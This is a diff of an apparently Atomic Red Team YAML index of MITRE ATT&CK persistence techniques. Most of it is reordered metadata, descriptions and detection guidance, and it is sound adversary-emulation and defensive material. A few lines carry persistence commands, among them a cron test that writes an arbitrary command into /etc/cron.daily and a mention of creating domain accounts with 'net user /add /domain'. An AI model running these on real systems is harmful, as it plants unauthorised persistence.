+ - Ability to update component device firmware from the host operating system.
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host intrusion prevention systems
+ - File monitoring
+ x_mitre_detection: |-
+ Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
+
+ Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
x_mitre_data_sources:
- Component firmware
- Process monitoring
- Disk forensics
- API monitoring
- x_mitre_detection: |-
- Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
-
- Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host intrusion prevention systems
- - File monitoring
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_system_requirements:
- - Ability to update component device firmware from the host operating system.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.015:
technique:
@@ -9720,18 +9935,12 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-16T14:19:22.457Z'
+ modified: '2020-07-09T13:55:51.172Z'
created: '2020-03-16T14:12:47.923Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - ENDGAME
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
- - DLL monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "There are opportunities to detect COM hijacking by searching
for Registry references that have been replaced and through Registry operations
(ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary
@@ -9747,10 +9956,16 @@ persistence:
if software DLL loads are collected and analyzed, any unusual DLL load that
can be correlated with a COM object Registry modification may indicate COM
hijacking has been performed. "
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ - DLL monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Elastic
+ x_mitre_platforms:
+ - Windows
identifier: T1546.015
atomic_tests:
- name: COM Hijack Leveraging user scope COR_PROFILER
@@ -9889,22 +10104,22 @@ persistence:
phase_name: persistence
modified: '2020-03-27T14:49:58.249Z'
created: '2020-02-11T18:18:34.279Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_contributors:
+ - CrowdStrike Falcon OverWatch
+ x_mitre_data_sources:
+ - Process monitoring
+ - Binary file metadata
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
for changes to client software that do not correlate with known software or
patch cycles. \n\nConsider monitoring for anomalous behavior from client applications,
such as atypical module loads, file reads/writes, or network connections."
- x_mitre_data_sources:
- - Process monitoring
- - Binary file metadata
- x_mitre_contributors:
- - CrowdStrike Falcon OverWatch
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
atomic_tests: []
T1136:
technique:
@@ -9931,8 +10146,23 @@ persistence:
phase_name: persistence
modified: '2020-03-24T12:44:28.199Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_permissions_required:
- - Administrator
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Microsoft Threat Intelligence Center (MSTIC)
+ - Praetorian
+ x_mitre_version: '2.1'
+ x_mitre_data_sources:
+ - Office 365 account logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ - Process monitoring
+ - Process command-line parameters
+ - Authentication logs
+ - Windows event logs
+ x_mitre_detection: |-
+ Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.
+
+ Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.
x_mitre_platforms:
- Linux
- macOS
@@ -9942,45 +10172,20 @@ persistence:
- Azure AD
- Azure
- Office 365
- x_mitre_detection: |-
- Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.
-
- Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.
- x_mitre_data_sources:
- - Office 365 account logs
- - Azure activity logs
- - AWS CloudTrail logs
- - Process monitoring
- - Process command-line parameters
- - Authentication logs
- - Windows event logs
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Microsoft Threat Intelligence Center (MSTIC)
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - Administrator
atomic_tests: []
T1543:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1543
- url: https://attack.mitre.org/techniques/T1543
- - url: https://technet.microsoft.com/en-us/library/cc772408.aspx
- description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
- source_name: TechNet Services
- - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
- description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
- July 10, 2017.
- source_name: AppleDocs Launch Agent Daemons
- - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
- description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
- OS X Malware Detection & Analysis. Retrieved July 10, 2017.'
- source_name: OSX Malware Detection
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Create or Modify System Process
+ created: '2020-01-10T16:03:18.865Z'
+ modified: '2020-03-25T22:32:16.537Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
description: "Adversaries may create or modify system-level processes to repeatedly
execute malicious payloads as part of persistence. When operating systems
boot up, they can start processes that perform background system functions.
@@ -9996,15 +10201,25 @@ persistence:
under root/SYSTEM privileges. Adversaries may leverage this functionality
to create or modify system processes in order to escalate privileges. (Citation:
OSX Malware Detection). "
- id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T22:32:16.537Z'
- created: '2020-01-10T16:03:18.865Z'
+ name: Create or Modify System Process
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1543
+ url: https://attack.mitre.org/techniques/T1543
+ - url: https://technet.microsoft.com/en-us/library/cc772408.aspx
+ description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
+ source_name: TechNet Services
+ - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
+ description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
+ July 10, 2017.
+ source_name: AppleDocs Launch Agent Daemons
+ - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
+ description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
+ OS X Malware Detection & Analysis. Retrieved July 10, 2017.'
+ source_name: OSX Malware Detection
x_mitre_platforms:
- Windows
- macOS
@@ -10055,12 +10270,11 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-23T23:30:46.546Z'
created: '2019-12-03T14:25:00.538Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -10071,11 +10285,12 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
- x_mitre_permissions_required:
- - User
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
@@ -10127,6 +10342,30 @@ persistence:
command: echo "#{command}" > /etc/cron.daily/#{cron_script_name}
T1574.001:
technique:
+ created: '2020-03-13T18:11:08.357Z'
+ modified: '2020-03-26T16:13:58.862Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
+
+ There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
+
+ Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)
+
+ If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
+ Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
+ name: DLL Search Order Hijacking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.001
@@ -10157,30 +10396,6 @@ persistence:
url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html
description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking
Revisited. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: DLL Search Order Hijacking
- description: |-
- Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
-
- There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
-
- Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)
-
- If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
- Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
- id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T16:13:58.862Z'
- created: '2020-03-13T18:11:08.357Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -10257,23 +10472,23 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T16:23:21.010Z'
+ modified: '2020-06-20T22:05:42.513Z'
created: '2020-03-13T19:41:37.908Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Loaded DLLs
- - Process monitoring
- - Process use of network
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor processes for unusual activity (e.g., a process that
does not use the network begins to do so). Track DLL metadata, such as a hash,
and compare DLLs that are loaded at process execution time against previous
executions to detect differences that do not correlate with patching or updates.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Loaded DLLs
+ - Process monitoring
+ - Process use of network
+ x_mitre_platforms:
+ - Windows
identifier: T1574.002
atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -10340,6 +10555,20 @@ persistence:
phase_name: initial-access
modified: '2020-03-23T21:37:34.567Z'
created: '2020-03-13T20:15:31.974Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_detection: Monitor whether default accounts have been activated or logged
+ into. These audits should also include checks on any appliances and applications
+ for default credentials or SSH keys, and if any are discovered, they should
+ be updated immediately.
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
x_mitre_platforms:
- Linux
- macOS
@@ -10350,23 +10579,24 @@ persistence:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_detection: Monitor whether default accounts have been activated or logged
- into. These audits should also include checks on any appliances and applications
- for default credentials or SSH keys, and if any are discovered, they should
- be updated immediately.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1136.002:
technique:
+ created: '2020-01-28T14:05:17.825Z'
+ modified: '2020-03-23T18:12:36.696Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ id: attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177
+ description: |-
+ Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.
+
+ Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
+ name: Domain Account
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1136.002
@@ -10375,21 +10605,6 @@ persistence:
description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account
was created. Retrieved June 30, 2017.'
url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Domain Account
- description: |-
- Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.
-
- Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
- id: attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- modified: '2020-03-23T18:12:36.696Z'
- created: '2020-01-28T14:05:17.825Z'
x_mitre_platforms:
- Windows
- macOS
@@ -10412,6 +10627,27 @@ persistence:
atomic_tests: []
T1078.002:
technique:
+ created: '2020-03-13T20:21:54.758Z'
+ modified: '2020-03-23T21:08:40.063Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ type: attack-pattern
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ name: Domain Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
@@ -10428,27 +10664,6 @@ persistence:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Domain Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- modified: '2020-03-23T21:08:40.063Z'
- created: '2020-03-13T20:21:54.758Z'
x_mitre_platforms:
- Linux
- macOS
@@ -10502,12 +10717,13 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T15:32:06.115Z'
+ modified: '2020-06-20T22:06:47.115Z'
created: '2020-03-16T15:23:30.896Z'
- x_mitre_defense_bypassed:
- - Process whitelisting
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
x_mitre_detection: 'Objective-See''s Dylib Hijacking Scanner can be used to
detect potential cases of dylib hijacking. Monitor file systems for moving,
renaming, replacing, or modifying dylibs. Changes in the set of dylibs that
@@ -10515,11 +10731,10 @@ persistence:
with known software, patches, etc., are suspicious. Check the system for multiple
dylibs with the same name and monitor which versions have historically been
loaded into a process. '
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
atomic_tests: []
T1546.014:
technique:
@@ -10558,18 +10773,18 @@ persistence:
phase_name: persistence
modified: '2020-03-24T21:37:25.307Z'
created: '2020-01-24T15:15:13.426Z'
- x_mitre_platforms:
- - macOS
- x_mitre_contributors:
- - Ivan Sinyakov
- x_mitre_data_sources:
- - File monitoring
- x_mitre_detection: Monitor emond rules creation by checking for files created
- or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_detection: Monitor emond rules creation by checking for files created
+ or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_contributors:
+ - Ivan Sinyakov
+ x_mitre_platforms:
+ - macOS
identifier: T1546.014
atomic_tests:
- name: Persistance with Event Monitor - emond
@@ -10622,25 +10837,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T21:37:25.477Z'
+ modified: '2020-07-09T13:55:51.501Z'
created: '2020-01-22T21:04:23.285Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - API monitoring
- - Windows event logs
- - System calls
- - Binary file metadata
- - Process use of network
- - WMI Objects
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
- - DLL monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: "Monitoring for additions or modifications of mechanisms
that could be used to trigger event-based execution, especially the addition
of abnormal commands such as execution of unknown programs, opening network
@@ -10661,8 +10861,23 @@ persistence:
of behavior that could lead to other activities, such as making network connections
for Command and Control, learning details about the environment through Discovery,
and conducting Lateral Movement. "
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - API monitoring
+ - Windows event logs
+ - System calls
+ - Binary file metadata
+ - Process use of network
+ - WMI Objects
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ - DLL monitoring
+ - Windows Registry
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1098.002:
technique:
@@ -10699,23 +10914,23 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-23T19:49:17.544Z'
+ modified: '2020-05-04T19:18:36.254Z'
created: '2020-01-19T16:54:28.516Z'
- x_mitre_platforms:
- - Windows
- - Office 365
x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_data_sources:
- - Office 365 audit logs
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
A larger than normal volume of emails sent from an account and similar phishing emails sent from real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1574.005:
technique:
@@ -10753,27 +10968,27 @@ persistence:
phase_name: defense-evasion
modified: '2020-03-26T19:20:23.030Z'
created: '2020-03-13T11:12:18.558Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Stefan Kanthak
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- x_mitre_detection: |-
- Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
-
- Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_effective_permissions:
- Administrator
- User
- SYSTEM
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
+
+ Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1133:
technique:
@@ -10803,23 +11018,24 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T19:37:54.071Z'
+ modified: '2020-06-19T20:07:09.600Z'
created: '2017-05-31T21:31:44.421Z'
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Daniel Oakley
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Follow best practices for detecting adversary use of [Valid
Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to
remote services. Collect authentication logs and analyze for unusual access
patterns, windows of activity, and access outside of normal business hours.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Daniel Oakley
+ - Travis Smith, Tripwire
+ x_mitre_version: '2.1'
atomic_tests: []
T1574:
technique:
@@ -10836,7 +11052,7 @@ persistence:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Hijack Execution Flow
description: |-
- Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as whitelisting or other restrictions on execution.
+ Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.
id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6
@@ -10848,17 +11064,15 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T17:33:44.855Z'
+ modified: '2020-06-26T16:09:59.324Z'
created: '2020-03-12T20:38:12.465Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Environment variable
+ - Loaded DLLs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - DLL monitoring
x_mitre_detection: |-
